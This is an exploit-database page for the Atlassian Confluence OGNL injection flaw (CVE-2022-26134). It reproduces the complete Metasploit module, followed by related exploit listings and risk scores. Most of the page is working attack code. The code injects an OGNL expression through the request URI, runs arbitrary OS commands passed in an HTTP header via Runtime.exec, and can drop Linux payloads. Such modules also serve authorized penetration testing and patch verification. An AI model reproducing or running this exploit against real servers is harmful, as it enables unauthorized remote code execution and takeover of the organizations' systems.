Atlassian Confluence Namespace OGNL Injection

🗓️ 08 Jun 2022 00:00:00Reported by unknown, Spencer McIntyre, jbaines-r7, bturner-r7, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 712 Views

Atlassian Confluence Namespace OGNL Injection evaluates OGNL expression resulting in OS command executio

Reporter	Title	Published	Views	Family All 265
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	10 Jun 202208:57	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	4 Sep 202114:53	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	5 Jun 202218:23	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	10 Jun 202218:07	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	23 Nov 202405:35	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	7 Jun 202211:17	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	9 Jun 202202:11	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	7 Jun 202206:57	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	7 Jun 202208:58	–	githubexploit
GithubExploit	Exploit for Expression Language Injection in Atlassian Confluence_Data_Center	1 Sep 202107:15	–	githubexploit

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
prepend Msf::Exploit::Remote::AutoCheck  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Atlassian Confluence Namespace OGNL Injection',  
'Description' => %q{  
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to  
evaluate an OGNL expression resulting in OS command execution.  
},  
'Author' => [  
'Unknown', # exploited in the wild  
'bturner-r7',  
'jbaines-r7',  
'Spencer McIntyre'  
],  
'References' => [  
['CVE', '2021-26084'],  
['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],  
['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],  
['URL', 'https://github.com/jbaines-r7/through_the_wire'],  
['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']  
],  
'DisclosureDate' => '2022-06-02',  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],  
'Privileged' => false,  
'Targets' => [  
[  
'Unix Command',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :cmd  
}  
],  
[  
'Linux Dropper',  
{  
'Platform' => 'linux',  
'Arch' => [ARCH_X86, ARCH_X64],  
'Type' => :dropper  
}  
]  
],  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'RPORT' => 8090  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [true, 'Base path', '/'])  
])  
end  
  
def check  
version = get_confluence_version  
return CheckCode::Unknown unless version  
  
vprint_status("Detected Confluence version: #{version}")  
header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"  
res = inject_ognl('', header: header) # empty command works for testing, the header will be set  
  
return CheckCode::Unknown unless res  
  
unless res && res.headers.include?(header)  
return CheckCode::Safe('Failed to test OGNL injection.')  
end  
  
CheckCode::Vulnerable('Successfully tested OGNL injection.')  
end  
  
def get_confluence_version  
return @confluence_version if @confluence_version  
  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'login.action')  
)  
return nil unless res&.code == 200  
  
poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text  
return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/  
  
@confluence_version = Rex::Version.new(Regexp.last_match(1))  
@confluence_version  
end  
  
def exploit  
print_status("Executing #{payload_instance.refname} (#{target.name})")  
  
case target['Type']  
when :cmd  
execute_command(payload.encoded)  
when :dropper  
execute_cmdstager  
end  
end  
  
def execute_command(cmd, _opts = {})  
header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"  
res = inject_ognl(cmd, header: header)  
  
unless res && res.headers.include?(header)  
fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")  
end  
  
vprint_good("Successfully executed command: #{cmd}")  
res.headers[header]  
end  
  
def inject_ognl(cmd, header:)  
send_request_cgi(  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),  
'headers' => { header => cmd }  
)  
end  
  
def ognl_payload(_cmd, header:)  
<<~OGNL.gsub(/^\s+/, '').tr("\n", '')  
${  
Class.forName("com.opensymphony.webwork.ServletActionContext")  
.getMethod("getResponse",null)  
.invoke(null,null)  
.setHeader("#{header}",  
Class.forName("javax.script.ScriptEngineManager")  
.newInstance()  
.getEngineByName("js")  
.eval("java.lang.Runtime.getRuntime().exec([  
#{target['Platform'] == 'win' ? "'cmd.exe','/c'" : "'/bin/sh','-c'"},  
com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')  
]); '#{Faker::Internet.uuid}'")  
)  
}  
OGNL  
end  
end  
`

08 Jun 2022 00:00Current

9High risk

Vulners AI Score9

CVSS 27.5

CVSS 3.19.8

EPSS0.9444